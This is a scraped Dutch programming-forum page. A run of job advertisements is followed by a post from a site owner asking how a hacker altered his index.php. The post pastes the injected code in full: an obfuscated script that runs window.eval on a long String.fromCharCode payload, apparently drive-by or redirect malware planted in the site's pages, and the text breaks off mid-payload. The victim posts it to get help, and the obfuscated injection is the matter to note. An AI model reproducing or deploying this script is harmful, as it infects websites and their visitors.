Gehacked, wat nu?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Back-end Developer Java

Dit ga je doen Het (door)ontwikkelen van een zelfgebouwde applicatie in Java, Spring Framework, SQL, HTML, CSS en Javascript; End-to-end beheer m.b.t. de applicatie en koppelen van applicaties binnen het landschap; Ontwikkelen van rapportages voor de interne organisatie; Ontwikkelen van aanvullende functionaliteiten m.b.t. de applicatie; Uitvoeren van testen en code reviews. Hier ga je werken Binnen deze organisatie kom je te werken op de afdeling die medische gegevens verzamelt vanuit het hele land. Denk hierbij aan vertrouwelijke persoonsgegevens. Het team verwerkt al deze data met als doel het waarborgen en verbeteren van de kwaliteit van de zorg in heel Nederland.

Bekijk vacature »

IoT Software Developer PHP

Functie omschrijving Voor een klein softwarebedrijf in Breda, zijn wij op zoek naar een IoT software developer met kennis van PHP. In deze rol wordt je verantwoordelijk voor het vernieuwen van het multimedia platform van een super tof bedrijf in Breda. Je gebruikt PHP als programmeerlaag, en bent in staat om de helicopterview te pakken / projectmatig te werken. Jouw werkzaamheden zien er als volgt uit: Je gaat aan de slag met de ontwikkeling en vernieuwing van het "intern" ontwikkelde multimedia platform. Je neemt de lead in het moderniseren van het platform door het deels opnieuw op te zetten of

Bekijk vacature »

Belastingdienst - Freelance Applicatieontwikkelaar

Startdatum: 01.06.2023 Richttarief: €65,00 - €75,00 Duur van de opdracht: 6 maanden Uren per week: 36 Taal: Nederlands vereist! Gelieve in het Nederlands te solliciteren. Hybride. Kantoordagen in Utrecht, incidenteel in Apeldoorn Functieomschrijving: De afdeling IV – Generieke Voorzieningen – Interactie Online is onderdeel van de keten Interactie. De missie van de keten is: “het faciliteren van de interactie met alle burgers, bedrijven en hun vertegenwoordigers om hen in staat te stellen aan hun fiscale verplichtingen te voldoen en aanspraak te maken op hun rechten.” De afdeling Interactie Online heeft een belangrijke bijdrage binnen deze keten. Dit door het ontwikkelen

Bekijk vacature »

Senior Front end developer Angular

Functie Er zijn momenteel 5 SCRUM-teams waarvan drie gefocust zijn op DevOps en de huidige projecten en twee op innovatie van de platformen. Jij zal onderdeel worden van het innovatie Scrum team. De 2 multidisciplinaire innovatie teams bestaan momenteel uit 14 werknemers. Jij als senior Front end developer wordt onderdeel van onze innovatieteams. De innovatieteams houden zich bezig met het door ontwikkelen van de huidige producten en denken na over nieuwe functionaliteiten. Binnen de rol van Front end developer krijg je veel vrijheid en kan je je dag zelf indelen. Dingen waar jij je dagelijks mee bezig zult houden is

Bekijk vacature »

C# Developer Research and Development - Delft

Vacature details Vakgebied: Software/IT Opleiding: Medior Werklocatie: Delft Vacature ID: 6307 Introductie C# Developer Research and Development - Delft - Onze klant is één van de meest innovatieve bedrijven in de region van Delft. Op dit moment zijn ze voor het innovatie centrum. In het innovatie centrum wordt gewerkt aan de nieuwste technieken voor navigatie software. R&D / C# / Pattern Recognition / Algorithms / 3d Data / DotNET Functieomschrijving Als C# Developer kom je te werken in een innovatief scrumteam. We ontwikkelen en door ontwikkelen de nieuwste technieken op het gebied van navigatie software. Deze software wordt onder andere

Bekijk vacature »

Traineeship Full Stack .NET Developer

Dit ga je doen Start op 7 augustus bij de Experis Academy en ontwikkel jezelf tot een gewilde Full Stack .NET Developer. Maar hoe ziet het traineeship eruit en wat kun je verwachten? Periode 1 De eerste 3 maanden volg je fulltime, vanuit huis, een op maat gemaakte training in teamverband. Je leert belangrijke theorie en krijgt kennis van de benodigde vaardigheden en competenties die nodig zijn om de IT-arbeidsmarkt te betreden. Zowel zelfstandig als in teamverband voer je praktijkopdrachten op het gebied van front- en backend development uit. Wat er per week op het programma staat kun je hier

Bekijk vacature »

React developer Inhouse cloudplatform

Functie De functie: Als front-end developer kom je te werken naast 2 andere front-end/React developers, waaronder één senior. Een hele mooie kans dus om in korte tijd veel nieuwe kennis en ervaring op te doen. Ze hebben momenteel veel werk hierin en daarom willen ze het team graag uitbreiden. Het is van belang dat je, zeker gezien het vele thuiswerken, in ieder geval al een aantal projecten hebt gedaan in React. Taken waar je aan kunt denken zijn het ontwikkelen van client-applicaties o.b.v. HTML5, React en andere open standaarden. Ook ben je nauw betrokken bij het implementeren van designs o.b.v.

Bekijk vacature »

.NET developer

Klaar voor een nieuwe uitdaging? Welke technologieën gaan schuil achter de dagelijkse energievoorziening? Als senior .NET developer bij Kenter maak jij samen met je team het verschil, zowel voor de interne organisatie als voor eindklanten. Samen bouwen jullie aan innovatieve dienstverlening met behulp van de nieuwste technologieën en tools. Het is een functie met veel vrijheid, goede arbeidsvoorwaarden én je draagt jouw steentje bij aan de energietransitie. Klinkt dit als iets voor jou? Lees dan verder of solliciteer direct! Wat ga je doen als senior .NET developer? Als senior .NET developer bij Kenter (onderdeel van Alliander) ben je van onschatbare

Bekijk vacature »

Java developer

Als Java Developer bij Sogeti ben je onderdeel van onze toonaangevende community die bestaat uit ruim 100 gepassioneerde professionals. In teamverband lever je mooie prestaties. Daarmee draag je aan bij de meerwaarde die wij leveren aan onze klanten. Geen werkdag is hetzelfde, je bent voortdurend bezig met het oplossen van allerlei complexe vraagstukken binnen bedrijfskritische systemen. Een voorbeeld hiervan is een cliënt-volgsysteem bij Reclassering Nederland. Andere klanten waar wij onder andere voor werken: KPN, Philips, Nationale-Nederlanden, Kamer van Koophandel, ABN AMRO, Bovemij, Arval en de Politie. Werken bij Sogeti Nieuwe ontwikkelingen volgen we op de voet en delen we binnen de

Bekijk vacature »

Software Developer

Dit ga je doen Ontwerpen, ontwikkelen en onderhouden van (mobiele) internettoepassingen; Ontwikkelen en onderhouden van Microservices; Ontwerpen en optimaliseren van databases; Identificeren van nieuwe trends/ontwikkelingen binnen de branche. Hier ga je werken Deze marktleider op gebied van fietsen en fietservaring is gevestigd in twee provincies, verspreid over meerdere locaties. Jij zult voornamelijk in regio Joure aan de slag gaan. De organisatie doelt zich op het leveren van kwalitatief hoogwaardige producten aan alle hun klanten. De organisatie telt circa 4.000 medewerkers in meer dan 10 verschillende landen. Momenteel is de organisatie op zoek naar een Software Developer wilt meewerken aan het

Bekijk vacature »

Medior Java developer

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Robot Programmeur

In het kort Drie redenen waarom deze vacature uniek is! Programmeren van zelflerende robots Werken op kantoor en testen in de bedrijfshal Je krijgt verantwoordelijkheid, vrijheid en je mag werken naar eigen inzicht De organisatie Hier ga je aan de slag Een bedrijf dat innovatieve robottoepassingen ontwerpt en bouwt voor onder andere de staal industrie, energie- bouw- en agrarische sector. De robots die vaak in combinatie met diverse randapparatuur geleverd worden vormen een totaaloplossing voor de klant. Dit zijn klanten over de hele wereld, van België en Duitsland tot China, India, maar ook in Nederland. Projecten waar momenteel aan wordt

Bekijk vacature »

.NET developer

Functie As a .NET developer you start in a driven and diverse development team. Your team consists of 16 IT professionals, including 7 software engineers. Because your new employer is internationally active, there are also international IT professionals working in the IT department. As a result, the official language is English. As a team you are responsible for a new Cloud Native product. This product runs entirely in Azure with a Progress Database and various Azure Functions. In addition, this product has a JS front-end, a REST API system and a layer in C # .NET. The idea is therefore

Bekijk vacature »

Laravel / PHP developer

Functie omschrijving Wij zijn op zoek naar een Medior PHP / Laravel Developer voor een IT-consultancy in de omgeving van Hoofddorp! Ben jij op zoek naar een leuke nieuwe uitdaging binnen een veelzijdige werkomgeving? Lees dan snel verder! Binnen dit bedrijf werk je in een ontwikkelteam, waarin je zeer betrokken bent en meedenkt over softwareoplossingen. Binnen dit Team hou je je bezig met het aanpassen, verbeteren en vernieuwen van de logistieke oplossingen. Je zult je bezig houden met de volgende werkzaamheden: Je gaat aan de hand van de wensen van klanten software ontwikkelen; Je bent bij het gehele proces betrokken;

Bekijk vacature »

Medior C# Developer

You'll build modern applications for Coolblue's back office. We have a lot of friends, and they crave well-structured data and user-friendly, task-focused applications. How do I become a Medior C# Developer at Coolblue? You regularly participate in brainstorm sessions about user experience, data, and task flow with the UX Designer, Product Owner, and Data Scientists in your team. Besides that you will create disconnected, highly congruent, and testable code that can easily be maintained and is future-proof. Want to become C# Developer at Coolblue? Read below if the job suits you. You enjoy doing this Working with various types of

Bekijk vacature »
John Cena

John Cena

09/07/2012 09:30:39
Quote Anchor link
Zo,

Men dempt de put als...

Maar, ik weet niet in welke put het fout ging.

De index.php is aangepast en er is een bepaalde code bij ingezet. Hoe wordt dit algemeen gedaan? FTP kraak?

De meest awkward looking code:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43,34,34,41,59,125,99,97,116,99,104,40,102,119,98,101,119,101,41,123,105,61,48,59,116,114,121,123,112,114,111,116,111,116,121,112,101,42,53,59,125,99,97,116,99,104,40,122,41,123,102,114,61,34,102,114,111,109,67,104,97,114,34,59,102,61,91,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,50,52,44,53,50,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,50,51,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,56,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,54,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,52,56,44,53,53,53,44,49,57,50,44,50,50,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,57,50,44,49,54,48,44,50,53,50,44,49,54,48,44,54,50,52,44,53,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,51,55,50,44,49,54,48,44,50,56,56,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,57,54,44,53,48,53,44,54,57,48,44,53,56,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,49,54,48,44,54,48,54,44,53,52,48,44,54,57,48,44,53,48,53,44,49,57,50,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,48,54,44,53,55,53,44,54,57,54,44,49,54,48,44,50,53,56,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,50,48,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,55,53,44,54,48,54,44,53,48,53,44,54,48,48,44,49,54,48,44,50,53,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,50,48,53,44,51,53,52,44,53,48,44,55,53,48,44,53,48,44,54,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,53,48,44,54,48,54,44,53,57,53,44,49,57,50,44,51,52,48,44,53,56,50,44,53,56,48,44,54,48,54,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,53,50,44,50,52,53,44,50,56,56,44,50,52,48,44,50,56,56,44,50,48,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,48,48,44,50,51,48,44,54,49,56,44,53,48,53,44,54,57,54,44,51,54,48,44,54,54,54,44,53,56,53,44,54,56,52,44,53,55,53,44,50,52,48,44,50,48,53,44,49,57,50,44,51,49,48,44,49,57,50,44,50,52,53,44,51,48,48,44,49,54,48,44,51,55,56,44,49,54,48,44,50,57,52,44,49,54,48,44,51,52,56,44,49,54,48,44,50,56,56,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,54,57,48,44,53,48,53,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,49,57,50,44,50,53,48,44,51,48,54,44,50,54,48,44,51,49,56,44,50,55,48,44,51,51,48,44,50,56,48,44,51,52,50,44,50,52,48,44,50,57,52,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,54,50,44,53,53,53,44,54,54,48,44,53,56,48,44,54,50,52,44,50,48,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,50,52,54,44,49,54,48,44,50,53,56,44,49,54,48,44,50,52,48,44,53,48,48,44,50,55,54,44,53,49,53,44,54,48,54,44,53,56,48,44,52,48,56,44,52,56,53,44,54,57,54,44,53,48,53,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,48,44,49,57,50,44,50,52,48,44,55,50,48,44,51,53,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,53,56,44,49,54,48,44,50,52,48,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,54,57,48,44,49,54,48,44,50,53,50,44,49,54,48,44,50,56,56,44,54,48,48,44,52,50,48,44,51,53,48,44,52,50,48,44,50,48,53,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,51,57,48,44,49,54,48,44,51,54,54,44,49,54,48,44,51,49,50,44,50,56,48,44,51,48,48,44,50,55,53,44,50,57,52,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,51,48,48,44,50,52,53,44,51,49,50,44,50,55,53,44,51,49,50,44,50,56,48,44,51,48,54,44,50,55,48,44,51,49,50,44,50,55,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,48,53,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,52,49,48,44,49,57,50,44,51,48,53,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,51,48,44,52,54,50,44,49,54,48,44,50,50,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,50,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,53,44,54,54,48,44,53,48,53,44,52,55,52,44,53,57,48,44,54,48,54,44,53,55,48,44,52,54,50,44,49,54,48,44,51,54,54,44,49,54,48,44,50,57,52,44,50,51,48,44,50,56,56,44,49,54,48,44,50,56,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,51,56,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,57,54,44,53,50,48,44,54,51,48,44,53,55,53,44,50,55,54,44,53,53,48,44,54,48,54,44,54,48,48,44,54,57,54,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,56,48,44,54,50,52,44,53,50,53,44,54,57,48,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,52,57,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,51,57,48,44,55,48,50,44,53,52,53,44,53,56,56,44,53,48,53,44,54,56,52,44,50,48,48,44,54,56,52,44,50,50,48,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,54,52,44,49,54,48,44,52,54,50,44,52,56,53,44,55,50,48,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,51,56,53,44,53,56,50,44,53,56,48,44,54,50,52,44,50,51,48,44,54,56,52,44,53,53,53,44,55,48,50,44,53,53,48,44,54,48,48,44,50,48,48,44,50,52,48,44,51,56,53,44,53,56,50,44,54,48,48,44,50,55,48,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,49,54,48,44,50,53,50,44,49,54,48,44,54,56,52,44,50,51,48,44,54,54,48,44,53,48,53,44,55,50,48,44,53,56,48,44,50,52,48,44,50,48,53,44,49,57,50,44,50,49,53,44,49,57,50,44,51,56,53,44,54,51,48,44,53,53,48,44,50,52,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,49,50,44,53,56,53,44,54,54,48,44,52,57,53,44,54,57,54,44,53,50,53,44,54,54,54,44,53,53,48,44,49,57,50,44,53,49,53,44,54,48,54,44,53,53,48,44,54,48,54,44,53,55,48,44,53,56,50,44,53,56,48,44,54,48,54,44,52,48,48,44,54,57,48,44,53,48,53,44,55,48,50,44,53,48,48,44,54,54,54,44,52,49,48,44,53,56,50,44,53,53,48,44,54,48,48,44,53,53,53,44,54,53,52,44,52,49,53,44,54,57,54,44,53,55,48,44,54,51,48,44,53,53,48,44,54,49,56,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,50,54,52,44,49,54,48,44,55,51,50,44,53,53,53,44,54,54,48,44,53,48,53,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,49,54,48,44,51,54,54,44,49,54,48,44,54,54,48,44,53,48,53,44,55,49,52,44,49,54,48,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,52,50,54,44,53,48,53,44,54,54,48,44,53,48,53,44,54,56,52,44,52,56,53,44,54,57,54,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,50,44,53,53,48,44,54,51,48,44,54,48,48,44,50,52,54,44,50,57,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,57,48,44,53,56,50,44,53,55,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,56,48,44,54,57,54,44,53,48,53,44,54,56,52,44,53,55,53,44,49,57,50,44,51,48,53,44,49,57,50,44,52,53,53,44,50,51,52,44,52,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,52,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,49,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,50,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,51,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,52,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,53,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,54,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,55,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,56,53,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,48,44,50,51,52,44,50,50,48,44,50,51,52,44,53,57,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,48,44,50,51,52,44,50,50,48,44,50,51,52,44,54,48,53,44,50,51,52,44,50,50,48,44,50,51,52,44,54,49,48,44,50,51,52,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,57,48,44,53,56,48,44,54,56,52,44,49,54,48,44,51,54,54,44,49,54,48,44,50,51,52,44,49,57,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,49,50,44,53,53,53,44,54,56,52,44,50,48,48,44,55,48,56,44,52,56,53,44,54,56,52,44,49,54,48,44,54,51,48,44,49,54,48,44,51,54,54,44,49,54,48,44,50,56,56,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,51,48,48,44,49,57,50,44,53,52,48,44,54,48,54,44,53,53,48,44,54,49,56,44,53,56,48,44,54,50,52,44,50,57,53,44,49,57,50,44,53,50,53,44,49,57,50,44,50,49,53,44,50,53,56,44,49,54,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,51,54,54,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,52,53,53,44,53,57,52,44,53,55,48,44,54,48,54,44,52,56,53,44,54,57,54,44,53,48,53,44,52,57,50,44,52,56,53,44,54,54,48,44,53,48,48,44,54,54,54,44,53,52,53,44,52,54,56,44,53,56,53,44,54,53,52,44,52,57,48,44,54,48,54,44,53,55,48,44,50,52,48,44,53,55,48,44,53,56,50,44,53,53,48,44,54,48,48,44,50,50,48,44,49,57,50,44,50,52,48,44,50,54,52,44,49,54,48,44,54,52,56,44,53,48,53,44,54,57,54,44,53,56,48,44,54,48,54,44,53,55,48,44,54,57,48,44,50,51,48,44,54,52,56,44,53,48,53,44,54,54,48,44,53,49,53,44,54,57,54,44,53,50,48,44,49,57,50,44,50,50,53,44,49,57,50,44,50,52,53,44,50,52,54,44,52,54,53,44,51,53,52,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,55,53,48,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,56,52,44,53,48,53,44,54,57,54,44,53,56,53,44,54,56,52,44,53,53,48,44,49,57,50,44,53,55,53,44,54,57,54,44,53,55,48,44,49,57,50,44,50,49,53,44,49,57,50,44,49,57,53,44,50,55,54,44,49,57,53,44,49,57,50,44,50,49,53,44,49,57,50,44,54,49,48,44,54,54,54,44,53,53,48,44,54,48,54,44,50,57,53,44,54,48,44,54,50,53,44,54,48,44,53,48,44,54,57,48,44,53,48,53,44,54,57,54,44,52,50,48,44,54,51,48,44,53,52,53,44,54,48,54,44,53,53,53,44,55,48,50,44,53,56,48,44,50,52,48,44,53,49,48,44,55,48,50,44,53,53,48,44,53,57,52,44,53,56,48,44,54,51,48,44,53,53,53,44,54,54,48,44,50,48,48,44,50,52,54,44,54,49,53,44,54,48,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,53,56,48,44,54,56,52,44,54,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,54,51,48,44,53,49,48,44,50,52,48,44,53,56,48,44,55,50,54,44,53,54,48,44,54,48,54,44,53,53,53,44,54,49,50,44,49,54,48,44,54,51,48,44,53,49,48,44,54,56,52,44,52,56,53,44,54,53,52,44,53,48,53,44,53,50,50,44,52,56,53,44,54,57,48,44,51,51,53,44,54,56,52,44,53,48,53,44,53,56,50,44,53,56,48,44,54,48,54,44,53,48,48,44,49,57,50,44,51,48,53,44,51,54,54,44,49,54,48,44,50,48,52,44,53,56,53,44,54,54,48,44,53,48,48,44,54,48,54,44,53,49,48,44,54,51,48,44,53,53,48,44,54,48,54,44,53,48,48,44,50,48,52,44,50,48,53,44,55,51,56,44,53,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,48,44,49,57,50,44,49,54,